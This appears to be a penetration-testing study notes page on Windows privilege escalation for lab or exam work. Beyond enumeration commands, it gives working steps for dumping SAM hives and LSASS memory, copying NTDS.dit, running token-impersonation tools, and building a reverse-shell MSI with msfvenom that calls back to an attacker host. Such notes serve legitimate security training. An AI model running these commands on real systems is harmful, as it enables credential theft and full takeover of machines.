Pentest_Notes

🪟 Privilege Escalation — Windows

Organized notes for Windows privilege escalation techniques. Last Updated: 2026-03-27

---

Enumeration

Checklist

• Run WinPEAS or Seatbelt
• Check domain registration: dsregcmd
• Open PowerShell as admin (if possible)
• Import PowerView
• Run Seatbelt with system checks: Seatbelt.exe -group=system
• Show hidden files and file extensions
• Gather system info: systeminfo, whoami /all
• Check command history
• Examine environment variables
• Enumerate existing users and groups
• Get OS and AppLocker policies
• Check antivirus status
• Inspect system PATH
• List installed applications (check for KeePass!)
• Check services (start disabled ones like SSH)
• List running processes
• Check for service binary hijacking
• Inspect scheduled tasks
• Use Invoke-AllChecks from PowerUp
• Check startup directories and autostart entries
• Attempt RunAs with different users
• Inspect C:\ root, C:\Windows.old
• Search for sensitive files
• Attempt SAM database dump
• Run Live Forensicator scripts
• Check C:\Windows\System32\Drivers\etc\hosts

System Information

# System details
systeminfo
whoami /all
whoami /groups
whoami /priv

# User enumeration
net user
quser
net localgroup
net localgroup administrators

# Environment variables
Get-ChildItem Env:
$env:PATH

# Command history
Get-History
(Get-PSReadlineOption).HistorySavePath
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

# Domain check
dsregcmd /status

PowerView Import

Set-ExecutionPolicy Bypass -Scope Process
Import-Module C:\Tools\PowerView.ps1
Get-NetDomain

Automated Enumeration

# WinPEAS
.\winPEASx64.exe

# Seatbelt — system checks
.\Seatbelt.exe -group=system

# Seatbelt — all checks
.\Seatbelt.exe -group=all

# PowerUp — all checks
. .\PowerUp.ps1
Invoke-AllChecks

---

Service Exploitation

Service Binary Hijacking

# List services with paths
Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -eq "Running"}

# Check for unquoted service paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows"

DLL Hijacking

• Check for missing DLLs in service paths
• Use Process Monitor to find DLL load failures
• Place malicious DLL in writable directory that’s in the search path

---

Scheduled Tasks

# List all scheduled tasks
schtasks /query /fo LIST /v

# Filter non-Microsoft tasks
Get-ScheduledTask | Where-Object {$_.TaskPath -notlike '\Microsoft\*'} | Select-Object TaskName, TaskPath, State

---

Credential Hunting

Stored Credentials

# Check for stored credentials
cmdkey /list

# RunAs with stored creds
runas /savecred /user:<domain>\<user> cmd.exe

# Search for passwords in files
findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml

# Search recursively in user directories
Get-ChildItem -Path C:\Users\ -Include * -File -Recurse -ErrorAction SilentlyContinue

SAM Database

# Save SAM, SYSTEM, SECURITY hives
reg.exe save hklm\sam C:\sam.save
reg.exe save hklm\system C:\system.save
reg.exe save hklm\security C:\security.save

# Transfer to attacker and dump
impacket-secretsdump -sam sam.save -system system.save -security security.save LOCAL

LSASS Memory Dump

# Find LSASS PID
Get-Process lsass

# Dump LSASS via rundll32
rundll32 C:\windows\system32\comsvcs.dll, MiniDump <PID> C:\lsass.dmp full

# Parse LSASS dump on Linux
pypykatz lsa minidump /path/to/lsass.dmp

NTDS.dit Extraction

# Volume Shadow Copy
cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit

---

Common Privilege Escalation Vectors

AlwaysInstallElevated

# Check if enabled
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

If both return 1:

# Generate malicious MSI
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f msi -o shell.msi

# Install on target
msiexec /quiet /qn /i shell.msi

Token Impersonation (SeImpersonatePrivilege)

# Check if we have SeImpersonatePrivilege
whoami /priv

If SeImpersonatePrivilege is enabled, use:

• JuicyPotato (Server 2016/2019)
• PrintSpoofer (Server 2019/Windows 10)
• GodPotato (Multiple versions)
• SweetPotato

# PrintSpoofer
.\PrintSpoofer64.exe -i -c powershell

# GodPotato
.\GodPotato.exe -cmd "cmd /c whoami"

---

File System Inspection

# Check root of C:\
dir C:\ /a

# Check for Windows.old
dir C:\Windows.old /a

# Check hosts file
type C:\Windows\System32\Drivers\etc\hosts

# Search for flags
Get-ChildItem -Path C:\ -Recurse -File -Filter "proof.txt" -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\ -Recurse -File -Filter "local.txt" -ErrorAction SilentlyContinue

Application Inspection

# List installed applications
Get-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*" | Select-Object DisplayName, InstallLocation
Get-ItemProperty "HKLM:\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | Select-Object DisplayName, InstallLocation

# Running processes (sorted by CPU)
Get-Process | Sort-Object CPU -Descending

⚠️ CPTS Exam Tip: Always check for KeePass installations — they may contain password databases.

---

Common Pitfalls / Gotchas

• Not running WinPEAS with different privilege levels
• Forgetting to check PowerShell command history
• Missing stored credentials (cmdkey /list)
• Not checking C:\Windows.old for old SAM files
• Ignoring SeImpersonatePrivilege / SeAssignPrimaryTokenPrivilege
• Not checking AppLocker policies before trying to run tools
• Running tools from protected directories — use C:\Windows\Temp

References & Further Reading

• HackTricks Windows PrivEsc
• LOLBAS
• PayloadsAllTheThings - Windows PrivEsc ```